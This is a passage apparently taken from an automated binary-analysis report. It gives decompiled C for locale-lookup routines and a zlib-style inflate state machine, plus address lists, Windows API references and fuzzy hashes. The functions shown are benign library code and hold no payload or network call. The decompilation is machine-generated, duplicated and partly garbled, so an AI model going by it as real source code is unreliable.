    				intOrPtr _t24;
    				void* _t27;
    				int _t34;
    				intOrPtr _t37;
    				void* _t39;
    				void* _t42;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    				void* _t46;
    				void* _t49;
    				void* _t50;
    				void* _t51;
    				char* _t52;
    
    				_t49 = __edx;
    				_t51 = 0;
    				_t50 = 0x1a;
    				while(1) {
    					_t34 = _a16;
    					asm("cdq");
    					_t22 = _t50 + _t51 - _t49 >> 1;
    					_t37 =  *((intOrPtr*)(0x4bc3c0 + _t22 * 0x2c));
    					if(_a4 == _t37) {
    						break;
    					}
    					if(_a4 >= _t37) {
    						_t51 = _t22 + 1;
    					} else {
    						_t50 = _t22 - 1;
    					}
    					if(_t51 <= _t50) {
    						continue;
    					} else {
    						L6:
    						return GetLocaleInfoA(_a4, _a8, _a12, _t34);
    					}
    				}
    				_t39 = _a8 - 1;
    				if(_t39 == 0) {
    					_t24 = 0x4bc3c4 + _t22 * 0x2c;
    					L22:
    					if(_t24 == 0 || _t34 < 1) {
    						goto L6;
    					} else {
    						_t52 = _a12;
    						E004714B0(_t52, _t24, _t34 - 1);
    						_t52[_t34 - 1] = _t52[_t34 - 1] & 0x00000000;
    						_t27 = 1;
    						return _t27;
    					}
    				}
    				_t42 = _t39;
    				if(_t42 == 0) {
    					_t24 = 0x4bc3d0 + _t22 * 0x2c;
    					goto L22;
    				}
    				_t43 = _t42 - 4;
    				if(_t43 == 0) {
    					_t24 = 0x4bc3d8 + _t22 * 0x2c;
    					goto L22;
    				}
    				_t44 = _t43 - 4;
    				if(_t44 == 0) {
    					_t24 = 0x4bc3dc + _t22 * 0x2c;
    					goto L22;
    				}
    				_t45 = _t44 - 0xff6;
    				if(_t45 == 0) {
    					_t24 =  *((intOrPtr*)(0x4bc3cc + _t22 * 0x2c));
    					goto L22;
    				}
    				_t46 = _t45 - 1;
    				if(_t46 == 0) {
    					_t24 =  *((intOrPtr*)(0x4bc3d4 + _t22 * 0x2c));
    					goto L22;
    				}
    				if(_t46 != 0) {
    					goto L6;
    				}
    				_t24 = 0x4bc3e4 + _t22 * 0x2c;
    				goto L22;
    			}

    0x0047ed6e
    0x0047ed76
    0x0047ed78
    0x0047ed79
    0x0047ed7c
    0x0047ed7f
    0x0047ed82
    0x0047ed89
    0x0047ed92
    0x00000000
    0x00000000
    0x0047ed97
    0x0047ed9e
    0x0047ed99
    0x0047ed99
    0x0047ed99
    0x0047eda3
    0x00000000
    0x0047eda5
    0x0047eda5
    0x00000000
    0x0047edaf
    0x0047eda3
    0x0047edbf
    0x0047edc0
    0x0047ee20
    0x0047ee25
    0x0047ee27
    0x00000000
    0x0047ee36
    0x0047ee36
    0x0047ee3f
    0x0047ee47
    0x0047ee4e
    0x00000000
    0x0047ee4e
    0x0047ee27
    0x0047edc3
    0x0047edc4
    0x0047ee16
    0x00000000
    0x0047ee16
    0x0047edc6
    0x0047edc9
    0x0047ee0c
    0x00000000
    0x0047ee0c
    0x0047edcb
    0x0047edce
    0x0047ee02
    0x00000000
    0x0047ee02
    0x0047edd0
    0x0047edd6
    0x0047edf7
    0x00000000
    0x0047edf7
    0x0047edd8
    0x0047edd9
    0x0047edec
    0x00000000
    0x0047edec
    0x0047eddd
    0x00000000
    0x00000000
    0x0047ede2
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,?), ref: 0047EDAF
    Similarity
    • API ID: InfoLocale
    • String ID: 040a$1252$850$ESP$ESP
    • API String ID: 2299586839-1770330732
    • Opcode ID: 8ef497ba0311ae26d5c0931663908c646477a3aa802c0e199617975973725515
    • Instruction ID: eee7c04450d545d353a19342748c242166018a676046d824cbd5eca3d9b963af
    • Opcode Fuzzy Hash: 8ef497ba0311ae26d5c0931663908c646477a3aa802c0e199617975973725515
    • Instruction Fuzzy Hash: 3D216E32100503ABC7384E3ADEC99FB77D9D74C300744D6BBE809CA191D639EE45925E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0047E607(void* __ecx, void* __edx, intOrPtr* _a4, short* _a8, intOrPtr _a12) {
    				short* _t14;
    				void* _t15;
    				intOrPtr* _t20;
    				void* _t29;
    				short _t31;
    				short _t32;
    				intOrPtr* _t33;
    				void* _t34;
    				signed short _t35;
    				intOrPtr* _t36;
    				intOrPtr _t38;
    				void* _t40;
    				intOrPtr _t42;
    				intOrPtr _t52;
    
    				_t34 = __edx;
    				_t29 = __ecx;
    				_t42 =  *0x4e1b34; // 0x0
    				if(_t42 == 0) {
    					if(E0047ED38() == 0) {
    						 *0x4e1b34 = E0047ED6E;
    					} else {
    						 *0x4e1b34 =  *0x49218c;
    					}
    				}
    				_t36 = _a4;
    				if(_t36 == 0) {
    					L19:
    					E0047EC37();
    				} else {
    					 *0x4e1b24 = _t36;
    					if( *_t36 != 0) {
    						E0047E784(_t29, _t34, "|\xef\xbf\xbdI", 0x40, 0x						_t40 = _t40 + 0xc;
    					}
    					_t20 = _t36 + 0x40;
    					 *0x4e1b28 = _t20;
    					if(_t20 != 0 &&  *_t20 != 0) {
    						E0047E784(_t29, _t34, "l\xef\xbf\xbdI", 0x16, 0x						_t20 =  *0x4e1b28; // 0x0
    						_t40 = _t40 + 0xc;
    					}
    					_t33 =  *0x4e1b24; // 0x0
    					 *0x4e1b2c = 0;
    					if(_t33 == 0 ||  *_t33 == 0) {
    						__eflags = _t20;
    						if(_t20 == 0) {
    							goto L19;
    						}
    						__eflags =  *_t20;
    						if(__eflags == 0) {
    							goto L19;
    						}
    						E0047EB7A(__eflags);
    					} else {
    						if(_t20 == 0) {
    							L15:
    							E0047EA67(__eflags);
    							L20:
    							_t52 =  *0x4e1b2c; // 0x0
    							if(_t52 == 0) {
    								L31:
    								__eflags = 0;
    								return 0;
    							}
    							_t35 = E0047EC51(_t36 + 0x80);
    							if(_t35 == 0 || IsValidCodePage(_t35 & 0x0000ffff) == 0 || IsValidLocale( *0x4e1b14, 1) == 0) {
    								goto L31;
    							} else {
    								_t14 = _a8;
    								if(_t14 != 0) {
    									_t31 =  *0x4e1b14; // 0x0
    									 *_t14 = _t31;
    									_t32 =  *0x4e1b30; // 0x0
    									 *((short*)(_t14 + 2)) = _t32;
    									 *(_t14 + 4) = _t35;
    								}
    								_t38 = _a12;
    								if(_t38 == 0) {
    									L30:
    									_t15 = 1;
    									return _t15;
    								} else {
    									_push(0x40);
    									_push(_t38);
    									_push(0x1001);
    									_push( *0x4e1b14);
    									if( *0x4e1b34() == 0) {
    										goto L31;
    									}
    									_push(0x40);
    									_push(_t38 + 0x40);
    									_push(0x1002);
    									_push( *0x4e1b30);
    									if( *0x4e1b34() == 0) {
    										goto L31;
    									}
    									E004711D5(_t35, _t38 + 0x80, 0xa);
    									goto L30;
    								}
    							}
    						}
    						_t51 =  *_t20;
    						if( *_t20 == 0) {
    							goto L15;
    						}
    						E0047E7DC(_t51);
    					}
    				}
    			}

    0x0047e607
    0x0047e607
    0x0047e60a
    0x0047e612
    0x0047e61b
    0x0047e629
    0x0047e61d
    0x0047e622
    0x0047e622
    0x0047e61b
    0x0047e633
    0x0047e639
    0x0047e6bf
    0x0047e6bf
    0x0047e63f
    0x0047e63f
    0x0047e647
    0x0047e655
    0x0047e65a
    0x0047e65a
    0x0047e65d
    0x0047e662
    0x0047e667
    0x0047e679
    0x0047e67e
    0x0047e683
    0x0047e683
    0x0047e686
    0x0047e68c
    0x0047e694
    0x0047e6b0
    0x0047e6b2
    0x00000000
    0x00000000
    0x0047e6b4
    0x0047e6b6
    0x00000000
    0x00000000
    0x0047e6b8
    0x0047e69a
    0x0047e69c
    0x0047e6a9
    0x0047e6a9
    0x0047e6c4
    0x0047e6c4
    0x0047e6ca
    0x0047e77e
    0x0047e77e
    0x00000000
    0x0047e77e
    0x0047e6dc
    0x0047e6e1
    0x00000000
    0x0047e70b
    0x0047e70b
    0x0047e711
    0x0047e713
    0x0047e71a
    0x0047e71d
    0x0047e724
    0x0047e728
    0x0047e728
    0x0047e72c
    0x0047e732
    0x0047e779
    0x0047e77b
    0x00000000
    0x0047e734
    0x0047e734
    0x0047e736
    0x0047e737
    0x0047e73c
    0x0047e74a
    0x00000000
    0x00000000
    0x0047e74f
    0x0047e751
    0x0047e752
    0x0047e757
    0x0047e765
    0x00000000
    0x00000000
    0x0047e771
    0x00000000
    0x0047e776
    0x0047e732
    0x0047e6e1
    0x0047e69e
    0x0047e6a0
    0x00000000
    0x00000000
    0x0047e6a2
    0x0047e6a2
    0x0047e694

    APIs
    • IsValidCodePage.KERNEL32(00000000,004BC0C8,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047E6EB
    • IsValidLocale.KERNEL32(00000001), ref: 0047E701
      • Part of subcall function 0047ED38: GetVersionExA.KERNEL32(?), ref: 0047ED52
      • Part of subcall function 0047EB7A: EnumSystemLocalesA.KERNEL32(0047EBB1,00000001,004BC0C8,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047EB9A
    Similarity
    • API ID: Valid$CodeEnumLocaleLocalesPageSystemVersion
    • String ID: lI$|I
    • API String ID: 2902790910-1115132947
    • Opcode ID: c2214b4c1f9f3aa1cf7812849f689a4e30d61fa8f269100a687a81150b888806
    • Instruction ID: 9b2459b3c6860c4913e0f44a1b10b4bc78b618502993a035c3e067bd90e5eaa3
    • Opcode Fuzzy Hash: c2214b4c1f9f3aa1cf7812849f689a4e30d61fa8f269100a687a81150b888806
    • Instruction Fuzzy Hash: C631F8716802819ED7309F639CC1AE637949B2D740B5482BFE54C9E2F1E678A844CB6E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0044A170(intOrPtr* _a4, signed int _a8) {
    				signed int* _t129;
    				signed int _t177;
    				signed int _t180;
    				signed int _t231;
    				intOrPtr* _t235;
    				signed int _t236;
    
    				_t235 = _a4;
    				if(_t235 == 0 ||  *(_t235 + 0x1c) == 0 ||  *_t235 == 0) {
    					L48:
    					return 0xfffffffe;
    				} else {
    					_t231 = 0xfffffffb;
    					_t236 = 5;
    					_t177 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
    					_a8 = _t177;
    					while(1) {
    						L4:
    						_t129 =  *(_t235 + 0x1c);
    						_t180 =  *_t129;
    						if(_t180 > 0xd) {
    							goto L48;
    						}
    						switch( *((intOrPtr*)(_t180 * 4 +  &M0044A568))) {
    							case 0:
    								_t181 =  *((intOrPtr*)(_t235 + 4));
    								if(_t181 == 0) {
    									goto L36;
    								} else {
    									 *((intOrPtr*)(_t235 + 4)) = _t181 - 1;
    									_t231 = _t177;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t129[1] = 0;
    									_t131 =  *(_t235 + 0x1c);
    									 *_t235 =  *_t235 + 1;
    									if((_t131[1] & 0x0000000f) == 8) {
    										if((_t131[1] >> 4) + 8 <= _t131[4]) {
    											 *_t131 = 1;
    											goto L12;
    										} else {
    											 *_t131 = 0xd;
    											 *(_t235 + 0x18) = "invalid window size";
    											( *(_t235 + 0x1c))[1] = _t236;
    											goto L4;
    										}
    									} else {
    										 *_t131 = 0xd;
    										 *(_t235 + 0x18) = "unknown compression method";
    										( *(_t235 + 0x1c))[1] = _t236;
    										goto L4;
    									}
    								}
    								goto L52;
    							case 1:
    								L12:
    								_t132 =  *((intOrPtr*)(_t235 + 4));
    								if(_t132 == 0) {
    									goto L36;
    								} else {
    									 *((intOrPtr*)(_t235 + 4)) = _t132 - 1;
    									_t231 = _t177;
    									_t178 =  *(_t235 + 0x1c);
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t136 =  *_t235;
    									_t192 =  *_t136;
    									 *_t235 = _t136 + 1;
    									if((_t178[1] << 8) % 0x1f == 0) {
    										if((_t192 & 0x00000020) != 0) {
    											_t179 = _a8;
    											 *( *(_t235 + 0x1c)) = 2;
    											goto L35;
    										} else {
    											 *_t178 = 7;
    											_t177 = _a8;
    											_t236 = 5;
    											goto L4;
    										}
    									} else {
    										 *_t178 = 0xd;
    										_t177 = _a8;
    										_t236 = 5;
    										 *(_t235 + 0x18) = "incorrect header check";
    										( *(_t235 + 0x1c))[1] = 5;
    										goto L4;
    									}
    								}
    								goto L52;
    							case 2:
    								L35:
    								_t143 =  *((intOrPtr*)(_t235 + 4));
    								if(_t143 != 0) {
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									 *((intOrPtr*)(_t235 + 4)) = _t143 - 1;
    									_t232 = _t179;
    									( *(_t235 + 0x1c))[2] = 0 << 0x18;
    									 *_t235 =  *_t235 + 1;
    									 *( *(_t235 + 0x1c)) = 3;
    									goto L38;
    								} else {
    									goto L36;
    								}
    								goto L52;
    							case 3:
    								L38:
    								_t148 =  *((intOrPtr*)(_t235 + 4));
    								if(_t148 != 0) {
    									 *((intOrPtr*)(_t235 + 4)) = _t148 - 1;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t233 = _t179;
    									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 0x10);
    									 *_t235 =  *_t235 + 1;
    									 *( *(_t235 + 0x1c)) = 4;
    									goto L41;
    								} else {
    									return _t232;
    								}
    								goto L52;
    							case 4:
    								L41:
    								_t155 =  *((intOrPtr*)(_t235 + 4));
    								if(_t155 != 0) {
    									 *((intOrPtr*)(_t235 + 4)) = _t155 - 1;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t234 = _t179;
    									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 8);
    									 *_t235 =  *_t235 + 1;
    									 *( *(_t235 + 0x1c)) = 5;
    									goto L44;
    								} else {
    									return _t233;
    								}
    								goto L52;
    							case 5:
    								L44:
    								_t163 =  *((intOrPtr*)(_t235 + 4));
    								if(_t163 != 0) {
    									 *((intOrPtr*)(_t235 + 4)) = _t163 - 1;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2];
    									 *_t235 =  *_t235 + 1;
    									_t168 =  *(_t235 + 0x1c);
    									 *(_t235 + 0x30) = _t168[2];
    									 *_t168 = 6;
    									return 2;
    								} else {
    									return _t234;
    								}
    								goto L52;
    							case 6:
    								 *(__esi[7]) = 0xd;
    								__eax = __esi[7];
    								__esi[6] = "need dictionary";
    								 *((intOrPtr*)(__esi[7] + 4)) = 0;
    								goto L48;
    							case 7:
    								_push(__edi);
    								_push(__esi);
    								_push( *((intOrPtr*)(__eax + 0x14)));
    								__edi = E004577A0();
    								__esp = __esp + 0xc;
    								if(__edi != 0xfffffffd) {
    									if(__edi == 0) {
    										__edi = __ebx;
    									}
    									if(__edi != 1) {
    										goto L36;
    									} else {
    										__eax = __esi[7];
    										__edi = __ebx;
    										__eax = E00457720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
    										__eax = __esi[7];
    										if( *((intOrPtr*)(__eax + 0xc)) == 0) {
    											 *__eax = 8;
    											goto L25;
    										} else {
    											 *__eax = 0xc;
    											goto L4;
    										}
    									}
    								} else {
    									 *(__esi[7]) = 0xd;
    									__eax = __esi[7];
    									 *((intOrPtr*)(__eax + 4)) = 0;
    									goto L4;
    								}
    								goto L52;
    							case 8:
    								L25:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									goto L36;
    								} else {
    									__esi[1] = __eax;
    									__esi[2] = __esi[2] + 1;
    									__esi[2] = __esi[2] + 1;
    									__eax =  *__esi;
    									__edi = __ebx;
    									 *(__esi[7] + 8) = 0 << 0x18;
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									 *(__esi[7]) = 9;
    									goto L27;
    								}
    								goto L52;
    							case 9:
    								L27:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									goto L36;
    								} else {
    									__eax = __eax - 1;
    									__esi[2] = __esi[2] + 1;
    									__esi[1] = __eax;
    									__eax = __esi[7];
    									__edi = __ebx;
    									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									 *(__esi[7]) = 0xa;
    									goto L29;
    								}
    								goto L52;
    							case 0xa:
    								L29:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									goto L36;
    								} else {
    									__eax = __eax - 1;
    									__esi[2] = __esi[2] + 1;
    									__esi[1] = __eax;
    									__eax = __esi[7];
    									__edi = __ebx;
    									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									 *(__esi[7]) = 0xb;
    									goto L31;
    								}
    								goto L52;
    							case 0xb:
    								L31:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									L36:
    									return _t231;
    								} else {
    									__esi[1] = __eax;
    									__eax = __esi[7];
    									__esi[2] = __esi[2] + 1;
    									__edi = __ebx;
    									 *(__esi[7] + 8) =  *(__esi[7] + 8);
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
    										 *(__esi[7]) = 0xc;
    										goto L50;
    									} else {
    										 *__eax = 0xd;
    										__esi[6] = "incorrect data check";
    										 *((intOrPtr*)(__esi[7] + 4)) = __ebp;
    										goto L4;
    									}
    								}
    								goto L52;
    							case 0xc:
    								L50:
    								__eax = 1;
    								return 1;
    								goto L52;
    							case 0xd:
    								__eax = 0xfffffffd;
    								return 0xfffffffd;
    								goto L52;
    						}
    					}
    					goto L48;
    				}
    				L52:
    			}

    0x0044a173
    0x0044a17a
    0x0044a543
    0x0044a549
    0x0044a194
    0x0044a19d
    0x0044a1a6
    0x0044a1ab
    0x0044a1ae
    0x0044a1b2
    0x0044a1b2
    0x0044a1b2
    0x0044a1b5
    0x0044a1ba
    0x00000000
    0x00000000
    0x0044a1c0
    0x00000000
    0x0044a1c7
    0x0044a1cc
    0x00000000
    0x0044a1d2
    0x0044a1d5
    0x0044a1dc
    0x0044a1de
    0x0044a1e5
    0x0044a1e8
    0x0044a1f7
    0x0044a1f9
    0x0044a21e
    0x0044a238
    0x00000000
    0x0044a220
    0x0044a220
    0x0044a229
    0x0044a230
    0x00000000
    0x0044a230
    0x0044a1fb
    0x0044a1fb
    0x0044a204
    0x0044a20b
    0x00000000
    0x0044a20b
    0x0044a1f9
    0x00000000
    0x00000000
    0x0044a23e
    0x0044a23e
    0x0044a243
    0x00000000
    0x0044a249
    0x0044a24c
    0x0044a253
    0x0044a255
    0x0044a258
    0x0044a25b
    0x0044a264
    0x0044a267
    0x0044a275
    0x0044a29b
    0x0044a421
    0x0044a42a
    0x00000000
    0x0044a2a1
    0x0044a2a1
    0x0044a2a7
    0x0044a2ab
    0x00000000
    0x0044a2ab
    0x0044a277
    0x0044a277
    0x0044a280
    0x0044a284
    0x0044a289
    0x0044a290
    0x00000000
    0x0044a290
    0x0044a275
    0x00000000
    0x00000000
    0x0044a430
    0x0044a430
    0x0044a435
    0x0044a445
    0x0044a44a
    0x0044a452
    0x0044a457
    0x0044a460
    0x0044a462
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0044a468
    0x0044a468
    0x0044a46d
    0x0044a479
    0x0044a482
    0x0044a48a
    0x0044a494
    0x0044a49d
    0x0044a49f
    0x00000000
    0x0044a46f
    0x0044a475
    0x0044a475
    0x00000000
    0x00000000
    0x0044a4a5
    0x0044a4a5
    0x0044a4aa
    0x0044a4b6
    0x0044a4bf
    0x0044a4c7
    0x0044a4d1
    0x0044a4d7
    0x0044a4dc
    0x00000000
    0x0044a4ac
    0x0044a4b2
    0x0044a4b2
    0x00000000
    0x00000000
    0x0044a4de
    0x0044a4de
    0x0044a4e3
    0x0044a4f3
    0x0044a4f9
    0x0044a506
    0x0044a50c
    0x0044a50e
    0x0044a514
    0x0044a518
    0x0044a525
    0x0044a4e5
    0x0044a4eb
    0x0044a4eb
    0x00000000
    0x00000000
    0x0044a529
    0x0044a52f
    0x0044a532
    0x0044a539
    0x00000000
    0x00000000
    0x0044a2b8
    0x0044a2b9
    0x0044a2ba
    0x0044a2c0
    0x0044a2c2
    0x0044a2c8
    0x0044a2e4
    0x0044a2e6
    0x0044a2e6
    0x0044a2eb
    0x00000000
    0x0044a2f1
    0x0044a2f1
    0x0044a2f4
    0x0044a2ff
    0x0044a304
    0x0044a30f
    0x0044a31c
    0x00000000
    0x0044a311
    0x0044a311
    0x00000000
    0x0044a311
    0x0044a30f
    0x0044a2ca
    0x0044a2cd
    0x0044a2d3
    0x0044a2d6
    0x00000000
    0x0044a2d6
    0x00000000
    0x00000000
    0x0044a322
    0x0044a322
    0x0044a327
    0x00000000
    0x0044a32d
    0x0044a331
    0x0044a337
    0x0044a33a
    0x0044a33d
    0x0044a33f
    0x0044a346
    0x0044a34b
    0x0044a34c
    0x0044a34e
    0x0044a351
    0x00000000
    0x0044a351
    0x00000000
    0x00000000
    0x0044a357
    0x0044a357
    0x0044a35c
    0x00000000
    0x0044a362
    0x0044a367
    0x0044a369
    0x0044a36c
    0x0044a36f
    0x0044a376
    0x0044a380
    0x0044a385
    0x0044a386
    0x0044a388
    0x0044a38b
    0x00000000
    0x0044a38b
    0x00000000
    0x00000000
    0x0044a391
    0x0044a391
    0x0044a396
    0x00000000
    0x0044a39c
    0x0044a3a1
    0x0044a3a3
    0x0044a3a6
    0x0044a3a9
    0x0044a3b0
    0x0044a3ba
    0x0044a3bf
    0x0044a3c0
    0x0044a3c2
    0x0044a3c5
    0x00000000
    0x0044a3c5
    0x00000000
    0x00000000
    0x0044a3cb
    0x0044a3cb
    0x0044a3d0
    0x0044a437
    0x0044a43d
    0x0044a3d2
    0x0044a3d9
    0x0044a3dc
    0x0044a3df
    0x0044a3eb
    0x0044a3ed
    0x0044a3f2
    0x0044a3f3
    0x0044a3f5
    0x0044a400
    0x0044a54d
    0x00000000
    0x0044a406
    0x0044a406
    0x0044a40f
    0x0044a416
    0x00000000
    0x0044a416
    0x0044a400
    0x00000000
    0x00000000
    0x0044a556
    0x0044a556
    0x0044a55c
    0x00000000
    0x00000000
    0x0044a560
    0x0044a566
    0x00000000
    0x00000000
    0x0044a1c0
    0x00000000
    0x0044a1b2
    0x00000000

    Similarity
    • API ID:
    • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
    • API String ID: 0-2151277842
    • Opcode ID: 1f6f0b4644a23bd9a9b449cb1930b95cb91ac2a15b87c7039d48454153f42337
    • Instruction ID: 308507108e797b50b406cd64158127af8e156c807818d8a25e0ac970881b0078
    • Opcode Fuzzy Hash: 1f6f0b4644a23bd9a9b449cb1930b95cb91ac2a15b87c7039d48454153f42337
    • Instruction Fuzzy Hash: 06E1D2B5600A018FD324CF19D490A26FBF2EF89310B29C96ED49ACBB61D735E846CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00464BF0(intOrPtr* _a4, signed int _a8) {
    				signed int* _t129;
    				signed int _t177;
    				signed int _t180;
    				signed int _t231;
    				intOrPtr* _t235;
    				signed int _t236;
    
    				_t235 = _a4;
    				if(_t235 == 0 ||  *(_t235 + 0x1c) == 0 ||  *_t235 == 0) {
    					L48:
    					return 0xfffffffe;
    				} else {
    					_t231 = 0xfffffffb;
    					_t236 = 5;
    					_t177 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
    					_a8 = _t177;
    					while(1) {
    						L4:
    						_t129 =  *(_t235 + 0x1c);
    						_t180 =  *_t129;
    						if(_t180 > 0xd) {
    							goto L48;
    						}
    						switch( *((intOrPtr*)(_t180 * 4 +  &M00464FE8))) {
    							case 0:
    								_t181 =  *((intOrPtr*)(_t235 + 4));
    								if(_t181 == 0) {
    									goto L36;
    								} else {
    									 *((intOrPtr*)(_t235 + 4)) = _t181 - 1;
    									_t231 = _t177;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t129[1] = 0;
    									_t131 =  *(_t235 + 0x1c);
    									 *_t235 =  *_t235 + 1;
    									if((_t131[1] & 0x0000000f) == 8) {
    										if((_t131[1] >> 4) + 8 <= _t131[4]) {
    											 *_t131 = 1;
    											goto L12;
    										} else {
    											 *_t131 = 0xd;
    											 *(_t235 + 0x18) = "invalid window size";
    											( *(_t235 + 0x1c))[1] = _t236;
    											goto L4;
    										}
    									} else {
    										 *_t131 = 0xd;
    										 *(_t235 + 0x18) = "unknown compression method";
    										( *(_t235 + 0x1c))[1] = _t236;
    										goto L4;
    									}
    								}
    								goto L52;
    							case 1:
    								L12:
    								_t132 =  *((intOrPtr*)(_t235 + 4));
    								if(_t132 == 0) {
    									goto L36;
    								} else {
    									 *((intOrPtr*)(_t235 + 4)) = _t132 - 1;
    									_t231 = _t177;
    									_t178 =  *(_t235 + 0x1c);
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t136 =  *_t235;
    									_t192 =  *_t136;
    									 *_t235 = _t136 + 1;
    									if((_t178[1] << 8) % 0x1f == 0) {
    										if((_t192 & 0x00000020) != 0) {
    											_t179 = _a8;
    											 *( *(_t235 + 0x1c)) = 2;
    											goto L35;
    										} else {
    											 *_t178 = 7;
    											_t177 = _a8;
    											_t236 = 5;
    											goto L4;
    										}
    									} else {
    										 *_t178 = 0xd;
    										_t177 = _a8;
    										_t236 = 5;
    										 *(_t235 + 0x18) = "incorrect header check";
    										( *(_t235 + 0x1c))[1] = 5;
    										goto L4;
    									}
    								}
    								goto L52;
    							case 2:
    								L35:
    								_t143 =  *((intOrPtr*)(_t235 + 4));
    								if(_t143 != 0) {
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									 *((intOrPtr*)(_t235 + 4)) = _t143 - 1;
    									_t232 = _t179;
    									( *(_t235 + 0x1c))[2] = 0 << 0x18;
    									 *_t235 =  *_t235 + 1;
    									 *( *(_t235 + 0x1c)) = 3;
    									goto L38;
    								} else {
    									goto L36;
    								}
    								goto L52;
    							case 3:
    								L38:
    								_t148 =  *((intOrPtr*)(_t235 + 4));
    								if(_t148 != 0) {
    									 *((intOrPtr*)(_t235 + 4)) = _t148 - 1;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t233 = _t179;
    									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 0x10);
    									 *_t235 =  *_t235 + 1;
    									 *( *(_t235 + 0x1c)) = 4;
    									goto L41;
    								} else {
    									return _t232;
    								}
    								goto L52;
    							case 4:
    								L41:
    								_t155 =  *((intOrPtr*)(_t235 + 4));
    								if(_t155 != 0) {
    									 *((intOrPtr*)(_t235 + 4)) = _t155 - 1;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									_t234 = _t179;
    									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2] + (0 << 8);
    									 *_t235 =  *_t235 + 1;
    									 *( *(_t235 + 0x1c)) = 5;
    									goto L44;
    								} else {
    									return _t233;
    								}
    								goto L52;
    							case 5:
    								L44:
    								_t163 =  *((intOrPtr*)(_t235 + 4));
    								if(_t163 != 0) {
    									 *((intOrPtr*)(_t235 + 4)) = _t163 - 1;
    									 *((intOrPtr*)(_t235 + 8)) =  *((intOrPtr*)(_t235 + 8)) + 1;
    									( *(_t235 + 0x1c))[2] = ( *(_t235 + 0x1c))[2];
    									 *_t235 =  *_t235 + 1;
    									_t168 =  *(_t235 + 0x1c);
    									 *(_t235 + 0x30) = _t168[2];
    									 *_t168 = 6;
    									return 2;
    								} else {
    									return _t234;
    								}
    								goto L52;
    							case 6:
    								 *(__esi[7]) = 0xd;
    								__eax = __esi[7];
    								__esi[6] = "need dictionary";
    								 *((intOrPtr*)(__esi[7] + 4)) = 0;
    								goto L48;
    							case 7:
    								_push(__edi);
    								_push(__esi);
    								_push( *((intOrPtr*)(__eax + 0x14)));
    								__edi = E00466800();
    								__esp = __esp + 0xc;
    								if(__edi != 0xfffffffd) {
    									if(__edi == 0) {
    										__edi = __ebx;
    									}
    									if(__edi != 1) {
    										goto L36;
    									} else {
    										__eax = __esi[7];
    										__edi = __ebx;
    										__eax = E00457720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
    										__eax = __esi[7];
    										if( *((intOrPtr*)(__eax + 0xc)) == 0) {
    											 *__eax = 8;
    											goto L25;
    										} else {
    											 *__eax = 0xc;
    											goto L4;
    										}
    									}
    								} else {
    									 *(__esi[7]) = 0xd;
    									__eax = __esi[7];
    									 *((intOrPtr*)(__eax + 4)) = 0;
    									goto L4;
    								}
    								goto L52;
    							case 8:
    								L25:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									goto L36;
    								} else {
    									__esi[1] = __eax;
    									__esi[2] = __esi[2] + 1;
    									__esi[2] = __esi[2] + 1;
    									__eax =  *__esi;
    									__edi = __ebx;
    									 *(__esi[7] + 8) = 0 << 0x18;
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									 *(__esi[7]) = 9;
    									goto L27;
    								}
    								goto L52;
    							case 9:
    								L27:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									goto L36;
    								} else {
    									__eax = __eax - 1;
